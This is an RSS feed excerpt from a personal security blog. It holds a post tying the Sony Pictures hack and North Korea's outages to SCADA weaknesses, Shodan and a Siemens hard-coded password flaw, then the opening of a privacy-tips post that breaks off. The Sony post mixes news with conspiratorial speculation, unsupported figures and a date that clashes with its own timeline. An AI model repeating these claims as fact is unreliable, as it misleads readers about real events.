https://en.wikipedia.org/wiki/Global_surveillance_disclosures_%282013%E2%80%93present%29&lt;br /&gt;
&lt;br /&gt;
www.huffingtonpost.com/2015/02/16/nsa-computer-spying_n_6694736.html &lt;br /&gt;
&lt;br /&gt;
http://www.zdnet.com/article/nsa-gemalto-sim-card-encryption-hack-key-questions/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><link>https://unsecuritynow.blogspot.com/2015/03/off-radar.html</link><author>noreply@blogger.com (UnsecurityNow)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPwu6wSS0CJH2dal2y2WzXAeC7enmx_xu3ydNQUTv3hm28kHjNwm5XeM03yMF6zM1MG-gxVFB15nJGsrBBlGgEXEWGsg9EXYxjsgGkJWU7HlsbzjJGvyJfBTlgzJnWW0bs0-1jRk0DrlvN/s72-c/radar.jpeg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-8791930819133513728</guid><pubDate>Tue, 27 Jan 2015 19:32:00 +0000</pubDate><atom:updated>2015-02-06T16:49:35.528-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">attack</category><category domain="http://www.blogger.com/atom/ns#">cyberwar</category><category domain="http://www.blogger.com/atom/ns#">flaw</category><category domain="http://www.blogger.com/atom/ns#">gop</category><category domain="http://www.blogger.com/atom/ns#">hack</category><category domain="http://www.blogger.com/atom/ns#">infrastructure</category><category domain="http://www.blogger.com/atom/ns#">north korea</category><category domain="http://www.blogger.com/atom/ns#">reverse engineer</category><category domain="http://www.blogger.com/atom/ns#">scada</category><category domain="http://www.blogger.com/atom/ns#">security</category><category domain="http://www.blogger.com/atom/ns#">siemens</category><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">sony</category><category domain="http://www.blogger.com/atom/ns#">us</category><category domain="http://www.blogger.com/atom/ns#">vulnerability</category><title>North Korea, SONY and SCADA Flaws</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Over the last couple of months I have found some patterns and anomalies in the news (as well as in the not-so-traditional sources) about North Korea, SONY and SCADA insecurity. How do they all relate to each other? Is it really North Korea&#39;s fault? Was this already planned as a justification to attack North Korea, or did all of this happen to boost viewers of the not-so-cool movie The Interview? What about the new Hollywood movie Blackhat, which is about SCADA attacks on North Korea? Well, here are some facts:&lt;br /&gt;
&lt;br /&gt;
On November 24, 2014 a mystical image appeared on every SONY employee&#39;s computer at the same time warning them of an imminent demise.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqd3afPauMWYMyAj6_LBCp6Hjm2eheaGn7cfPB7Xyc-c42Oucq3VVb1dnXC8n87e2JSnsvD6WktpopVIP8-uu12UjqiR05Qs4cbsr00Kd5SE67m1ILRnk9qj4hbs73ePe-FR_PdgE_uG6l/s1600/hacked-by-gop-sony-pictures-under-attack-500.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqd3afPauMWYMyAj6_LBCp6Hjm2eheaGn7cfPB7Xyc-c42Oucq3VVb1dnXC8n87e2JSnsvD6WktpopVIP8-uu12UjqiR05Qs4cbsr00Kd5SE67m1ILRnk9qj4hbs73ePe-FR_PdgE_uG6l/s1600/hacked-by-gop-sony-pictures-under-attack-500.jpg&quot; height=&quot;400&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
The bad news appeared in the media by 10:50 AM, after SONY&#39;s phone systems, workstations, and e-mail servers were paralyzed across SONY&#39;s headquarters and all other locations.&amp;nbsp; The attackers threatened SONY by saying it was &quot;only the beginning&quot; and that they had also compromised its network and would release the &quot;internal data&quot; they had gathered.&amp;nbsp; They also blackmailed the company by threatening to release its &quot;top secrets&quot; if it did not &quot;obey&quot; their demands.&amp;nbsp; Whether these statements were true or not, they were released to the mass media. By obtaining 100 TB of information, the &quot;Guardians of Peace&quot; (as they called themselves) got some pre-release movies which were going to be aired early the following month. I am not going further with the description of this attack, but you can find more information here:&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://deadline.com/2014/12/sony-hack-timeline-any-pascal-the-interview-north-korea-1201325501&quot;&gt;http://deadline.com/2014/12/sony-hack-timeline-any-pascal-the-interview-north-korea-1201325501&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
On November 27, 2014, while SONY systems were still inaccessible, five movies were released to the public by these cyber criminals. One that caught the mass media&#39;s eye and people&#39;s attention was &quot;The Interview&quot;, a movie in which the dictator of North Korea, Kim Jong-un, is killed by some unofficial U.S. agents. This caused a plethora of commotion and unleashed catastrophic and suspicious events on North Korea. A North Korean website called this movie a &quot;provocative evil act.&quot;&lt;br /&gt;
&lt;br /&gt;
Suspiciously, by the next day, November 28, 2014, North Korea had already been blamed for SONY&#39;s breach by the FBI, which started conducting an in-depth investigation of the breach on December 1, 2015. After that week, the Associated Press blamed North Korea for the attack just because some &quot;cyber-security experts&quot; stated that they had found &quot;striking similarities&quot; between the code used in the hack 
of Sony Pictures Entertampment and the one used against South Korean companies and government agencies last year. Even though this seems like a blatant accusation, it wasn&#39;t until Thursday, December 18 that the U.S. government publicly accused North Korea of the attacks.&amp;nbsp; By this time, a huge amount of critical, sensitive and private data had been pulled from Sony Entertainment, including but not limited to future and past movie scripts and personal e-mail messages, putting in hot water various Sony personnel and involving Angelina Jolie, journalists (blamed for aiding the cyber-criminals) and U.S. President Barack Obama, who were all key ingredients in a very horrifying and unpredictable turmoil.&lt;br /&gt;
&lt;br /&gt;
After a series of threats from the cyber-criminals stating they were going to blow up theaters and the White House, President Obama stepped up for Sony and gave a speech about the consequences of &quot;not stepping up&quot; to this threat. President Obama also said he was going to take a &quot;proportional response&quot;. Days after his speech, SONY complied and released the movie. The funny thing is that, mysteriously, in late December (December 22, 2014), North Korea suffered a severe Internet outage which lasted nearly 10 hours and 24 hours of sustained instability on its networks. Not only that, North Korea had a blackout (yes, a power outage) after the Internet outage, and yesterday (January 26, 2015) North Korea&#39;s power lines started to have problems again.&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjzo-IKHc-p9GKMwrnZNvFtxh4OcVx4eeBmr4WCOTQiKlycRmzXnrLEBTW-7BGITnjos42sjtfCOhPtKk6fkNqpa5X2tiaLga8BmbJTc3E6tVlphl8Q408N0i20Xi5waK-CFYtI2GdeSct/s1600/150126-dyn-2-570x489.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjzo-IKHc-p9GKMwrnZNvFtxh4OcVx4eeBmr4WCOTQiKlycRmzXnrLEBTW-7BGITnjos42sjtfCOhPtKk6fkNqpa5X2tiaLga8BmbJTc3E6tVlphl8Q408N0i20Xi5waK-CFYtI2GdeSct/s1600/150126-dyn-2-570x489.png&quot; height=&quot;547&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Picture from: Dyn Research&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Whether this is a government-to-government attack or not, let&#39;s take a little look at SCADA systems.&amp;nbsp; SCADA (S&lt;span class=&quot;_Tgc&quot;&gt;upervisory Control and Data Acquisition) systems are systems which operate through an operational channel, by means of a series of commands to a centralized control panel. These systems include (but are not limited to) water purifiers, oil refineries, nuclear plants, laboratory gadgets, traffic lights, PLC (Programmable Logic Controller) peripherals and devices, and the backbone infrastructure of continents. The very bad part of this is that all of these critical infrastructure components can be accessed and managed from the Internet.&amp;nbsp; Even though SCADA systems have been around for longer than the Israeli and CIA&#39;s creation of the worm Stuxnet (2004), they got really popular after Stuxnet&#39;s attack on Iran&#39;s nuclear plant.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA4quXQbqqXr1u65AmQX8B6XV2wj00N8FNKZwIgEdiF_TEX4hBcZLEJFjuwWf-uSaU9Tp2u0WrD6mkM1lYiTVnhSNTQkpysHwlgmhFhVdLtJHe5cGCTMwtiQIouB6XGktEdamQDk4syKhE/s1600/nuclear+plant.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA4quXQbqqXr1u65AmQX8B6XV2wj00N8FNKZwIgEdiF_TEX4hBcZLEJFjuwWf-uSaU9Tp2u0WrD6mkM1lYiTVnhSNTQkpysHwlgmhFhVdLtJHe5cGCTMwtiQIouB6XGktEdamQDk4syKhE/s1600/nuclear+plant.jpg&quot; height=&quot;426&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;br /&gt;&lt;/span&gt;
Nowadays, people can benefit from the beauty of SCADA (and it can be abused by cyber-criminals) by using a very popular search engine called SHODAN (&lt;a href=&quot;http://www.shodanhq.com/&quot;&gt;www.shodanhq.com&lt;/a&gt;), which scans, retrieves, indexes and displays the login banners of hosts, by service (TELNET, FTP, SMB, HTTP, HTTPS, etc.), for any device connected to the Internet. This not only includes SCADA infrastructure devices, but also a plethora of other devices, such as baby monitors, CCTVs, digital refrigerators and toasters, backbone routers, gas stations and anything that contains a silicon-based micro-chip connected to the Internet. &lt;br /&gt;
&lt;br /&gt;
Regardless of the protocol, a user is able to see the banner information, which might reveal credential information; this increases by at least 50% the odds of a curious or malicious user brute-forcing their way into the system.&amp;nbsp; This is a serious risk. So serious that one member of U.S. Homeland Security described SHODAN as a national threat. &lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmdufFXb4RC5WVyp665DeY8EeOL2iaN3G_kfttddbQU5Tc-686fVlUo5wwGwMsfRT3JTBF4vw9W0u2qtsC8vWzBft0NIknKJfN1zyutTHoJoixF3zsE4HJ9pVEZM9AyG8SAU_FdbA3IAyz/s1600/SCADA+Screen.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmdufFXb4RC5WVyp665DeY8EeOL2iaN3G_kfttddbQU5Tc-686fVlUo5wwGwMsfRT3JTBF4vw9W0u2qtsC8vWzBft0NIknKJfN1zyutTHoJoixF3zsE4HJ9pVEZM9AyG8SAU_FdbA3IAyz/s1600/SCADA+Screen.JPG&quot; height=&quot;512&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Whether it is a threat or not, I strongly believe the people who have to take the blame are the ones who &quot;secure&quot; these critical systems so poorly and make them accessible on the Internet for all prying eyes. When they make it easy for attackers by using default passwords, for example, anyone researching that manufacturer or simply looking at the user guide can have instant access and actually take control of an entire city or continent. Also, weak passwords are implemented on these systems by lazy and ignorant system administrators. A very good example of this is the manufacturer&#39;s flaw in SIEMENS products.&lt;br /&gt;
&lt;br /&gt;
SIEMENS provides automated ways of managing electrical, medical, energy, financial, consumer and other systems.&amp;nbsp; Some of its products are very critical to global infrastructure, so they play a big role in SCADA systems.&amp;nbsp; In 2011, during the BlackHat - Las Vegas event, a security researcher showed a highly critical flaw in SIEMENS control systems. The flaw: a hard-coded administrator password in the firmware. Login information could be obtained by reverse engineering the code of their software, which could be available anywhere on the net. It is very hard to believe that a company with such a reputation and responsibility would make a mistake of this magnitude.&amp;nbsp; Not only could the attacker exploit this vulnerability, but they could also lock out the administrator, having total access to the system and preventing anyone from interfering with their evil plans and actions.&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXjhGFlPKpkshStvFXJF-d1Jm7oZwSixwQpdslN_iiqxeCMQkNd7J30AIUruFq5P9oCRUZehir9iTRYHh5ToTH8umAWvfY4vps-XxLtgklTZLtQ2LxydCFrfaGBGeuFyvUhf_-279bW_1b/s1600/siemens_plc_easter_egg-660x371.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXjhGFlPKpkshStvFXJF-d1Jm7oZwSixwQpdslN_iiqxeCMQkNd7J30AIUruFq5P9oCRUZehir9iTRYHh5ToTH8umAWvfY4vps-XxLtgklTZLtQ2LxydCFrfaGBGeuFyvUhf_-279bW_1b/s1600/siemens_plc_easter_egg-660x371.jpg&quot; height=&quot;358&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;span itemprop=&quot;articleBody&quot;&gt;Siemens PLC hidden Easter egg in the firmware from German&lt;i&gt; hackers. (Courtesy NSS Labs)&lt;/i&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Above is a message left by some German &quot;hackers&quot; just to prove that the system could be exploited.&lt;br /&gt;
&lt;br /&gt;
So, where is all this heading to? Are SCADA systems really that insecure? How can they avoid getting their products compromised? Are they liable if a city &quot;goes down&quot;? Is a hack able to actually kill city&#39;s residents by infecting the water or make a thermonuclear plant?&lt;br /&gt;
&lt;br /&gt;
This is where the new movie, Blackhat (&lt;a href=&quot;http://www.imdb.com/title/tt2717822&quot;&gt;http://www.imdb.com/title/tt2717822&lt;/a&gt;), comes into play. We all know Hollywood is very involved in everyone&#39;s lives because most of us love movies. Also, we all know the impact Hollywood has on our lives. One thing we know is that Hollywood has &quot;predicted&quot; so many events with hidden messages, symbolism and even movie scripts. It might seem like they have the &quot;magical crystal ball&quot; in their hands. Even though Hollywood recreates an imminent dystopia for all of us to see and wonder about our future, their movies are a little far from reality. The concept, though, is what we really have to look at. They are always right about the main point and theme of their movies. Separate the facts from the fiction and you will notice that one of Hollywood&#39;s new movies, Blackhat, is not very far from the truth. This movie is about a hacker being hired by the U.S. government to stop a black hat hacker (cracker or bad hacker) from causing a lot of chaos by affecting SCADA critical infrastructure points of North Korea and the WHOLE WORLD! &amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Apart from Stuxnet, nothing like this has ever been done, which proves that it is possible and that it is an option. There are also SCADA Trojans which are being improved right now to affect SCADA systems.&amp;nbsp; But whatever we have looked at might have been limited to the audience&#39;s eyes. Whatever we see and hear is already being filtered. There is, in fact, a cyber war going on right now and I would like to share this link with you: &lt;a href=&quot;http://map.ipviking.com/&quot;&gt;http://map.ipviking.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
It shows (in real time) which country is attacking who, their IP addresses (real or spoofed), destination, number of hits taken, etc.&amp;nbsp; It is not a simulation, nor a game. It is taken from the Norse Live Attack Intelligence database.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
With this graph in mind, along with North Korea&#39;s situation, what we know about SCADA and the movie Blackhat, I should ask these questions:&amp;nbsp; Are we all heading for an imminent disaster? Will it be a dystopian future as shown in Hollywood movies? What about war involving citizens? Will wars be fought with guns, drones and tanks or by attacking critical SCADA infrastructures?&amp;nbsp; Will only governments do this, or will hacktivists step up too to show their point of view?&amp;nbsp; I guess the future is very near and the only way of knowing is giving it time.&amp;nbsp; Only time will tell... &lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiYjzUoj4qW6EDzBvj4uLxZpuVMygEJ9f2U1Zl4arZuU6-4YM3-txUYxzAU4-Kdk6zafz-bqMBWaeUEWidemlZLy5i87W3wCVIvrFY-ptIlIkyHev-TISzzo6yLJ17-oz1aF0SlcA_7imL/s1600/cyberwar_thumb.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiYjzUoj4qW6EDzBvj4uLxZpuVMygEJ9f2U1Zl4arZuU6-4YM3-txUYxzAU4-Kdk6zafz-bqMBWaeUEWidemlZLy5i87W3wCVIvrFY-ptIlIkyHev-TISzzo6yLJ17-oz1aF0SlcA_7imL/s1600/cyberwar_thumb.png&quot; height=&quot;480&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Please, feel free to post your responses in the comments section below.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Sources:&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://deadline.com/2014/12/sony-hack-timeline-any-pascal-the-interview-north-korea-1201325501&quot;&gt;http://deadline.com/2014/12/sony-hack-timeline-any-pascal-the-interview-north-korea-1201325501&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.cnbc.com/id/102289459&quot;&gt;http://www.cnbc.com/id/102289459&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.theguardian.com/world/2014/dec/22/north-korea-suffers-internet-blackout&quot;&gt;http://www.theguardian.com/world/2014/dec/22/north-korea-suffers-internet-blackout&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;a href=&quot;https://www.northkoreatech.org/2015/01/27/more-internet-problems-hit-north-korea/&quot;&gt;https://www.northkoreatech.org/2015/01/27/more-internet-problems-hit-north-korea/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;a href=&quot;http://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/54/stuxnet-malware-targets-scada-systems&quot;&gt;http://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/54/stuxnet-malware-targets-scada-systems&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.wired.com/2011/08/siemens-hardcoded-password/&quot;&gt;http://www.wired.com/2011/08/siemens-hardcoded-password/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.imdb.com/title/tt2717822/&quot;&gt;http://www.imdb.com/title/tt2717822/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://map.ipviking.com/&quot;&gt;http://map.ipviking.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
</description><link>https://unsecuritynow.blogspot.com/2015/01/korea-scada-sony.html</link><author>noreply@blogger.com (UnsecurityNow)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqd3afPauMWYMyAj6_LBCp6Hjm2eheaGn7cfPB7Xyc-c42Oucq3VVb1dnXC8n87e2JSnsvD6WktpopVIP8-uu12UjqiR05Qs4cbsr00Kd5SE67m1ILRnk9qj4hbs73ePe-FR_PdgE_uG6l/s72-c/hacked-by-gop-sony-pictures-under-attack-500.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-2970401236084356012</guid><pubDate>Wed, 16 Jul 2014 22:22:00 +0000</pubDate><atom:updated>2015-01-03T13:10:14.980-06:00</atom:updated><title>How to Better Your Privacy</title><description>&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;h3 style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;
Reaching Out&lt;/span&gt;&lt;/h3&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;Nowadays we experience security differently from the way we did several
decades ago. &amp;nbsp;With all the new laws, regulations and government
surveillance, it is really hard for a regular user to keep their privacy on the net.
&amp;nbsp;Lately I have been a little absent from writing anything about security
because I wanted to know where it was heading. &amp;nbsp;Tight with job and
homework deadlines, I had little time for myself to really work something out
about security. &amp;nbsp;As a matter of fact, lately I haven&#39;t had much time to do
anything related to IT besides studying and working in the field.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;Having a new job working for a PaaS (platform as a service)
outsourcing company as a Unix System Administrator, I have kept myself
motivated with IT and burned the rest of my time finishing up my degree with
highest honors. After finishing my degree, I decided to begin my Bachelor&#39;s
degree in Cyber-Security. Now I can see myself with a little more time to keep
up to date learning new security methods, techniques and products. After
hearing about the whole Edward Snowden case, I was urged to write something
about our daily-diminished freedoms but first I wanted to touch base with basic
guidelines to keep yourself secure from the web. &amp;nbsp;Since this blog covers a
wide variety of audiences (beginner, medium and advanced), I thought it would be
a great idea to start with simple steps to maintain your anonymity, and here it
is. Enjoy and keep learning, my friends.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h3 style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;
Nothing is What It Seems&lt;/span&gt;&lt;/h3&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;As many of you might know, privacy cannot be obtained if we sacrifice
it to gain security. &amp;nbsp;Both must go together and never lose their
characteristics or quality, otherwise we lose both (Benjamin Franklin). Also,
security is a two-faced concept: &amp;nbsp;feeling secure and being secure.
&amp;nbsp;You can be safe and feel safe, or be unsafe and feel unsafe,
but this concept really makes sense and opens up to argument when there is a
curtain which prevents us from seeing what is really going on. &amp;nbsp;For
example, we can be secure and not feel it, or feel secure even when we are not.
Even though the latter is the most common one, both cases are not what they really
seem, thus the name &amp;nbsp;&quot;security by obscurity&quot;. This psychological
trick is practiced by many lawyers, law enforcement, the media and many
governments, entities and organizations. Even though they might
be playing with this concept to achieve their goals, our goal, the goal of 99%
of the population, &amp;nbsp;is to achieve the feeling of being secure AND the
reality of being secure.&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h3 style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;
How to Determine Real Security&lt;/span&gt;&lt;/h3&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;Through experiential knowledge (learning from experience) we can avoid
getting scammed again and identify a safe or unsafe environment a little
better. The problem arises when there is no transparency in the security
controls, or in the lifestyle that we live today with biased and misinformative
media, an excess of gadgets, unprotected access points, mobile Internet and on-line
banking. &amp;nbsp;The best way to be a little more secure and to feel secure is to
mitigate the risks of being watched, and this is done by limiting (if not eliminating)
our bad and lazy habits. &amp;nbsp;Everywhere we go, we leave not only physical
tracks but digital ones. Every time we turn on our car engine, play our favorite
satellite radio, browse Facebook, Twitter or LinkedIn, commute, text and call
using our phones, browse the Internet, or shop on-line or in person using a POS
(point-of-service) device by swiping our credit or debit card, we are leaving a
lot of physical and digital tracks, and this is only half a day. &amp;nbsp;Jot
down your daily activity and what technology &amp;nbsp;models you use. &amp;nbsp;After
making a list of all the technology models (car, phone, credit card, computer,
etc.), determine whether you are better off mitigating, if not eliminating, one or all of
these models. &amp;nbsp;One example is to take out cash once a week instead of
paying with your debit card every time you want to eat out or put gas in your
car. &amp;nbsp;This is real security. By avoiding risks through mitigating them, you achieve
real security. Next, there are some examples of ways to mitigate the risks of
digital and physical trails. &amp;nbsp;First (on the far left) there will be the
technology model, next the risk, next the solution and finally (far
right) what is accomplished by using the given solution. &amp;nbsp;Let&#39;s examine:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;Using car -&amp;gt; People know where you are -&amp;gt; Use public
transportation -&amp;gt; Spend less money. More security.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;Using satellite radio -&amp;gt; interest tracking -&amp;gt; Use iPod -&amp;gt;
More privacy. Still listen to what you want.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: .0001pt; margin: 0in;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;Pay with credit/debit card -&amp;gt; digital trail -&amp;gt; use cash
-&amp;gt; more privacy, avoid tracking.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;span style=&quot;line-height: 107%;&quot;&gt;Use phone -&amp;gt; call eavesdropping, less privacy -&amp;gt; Use
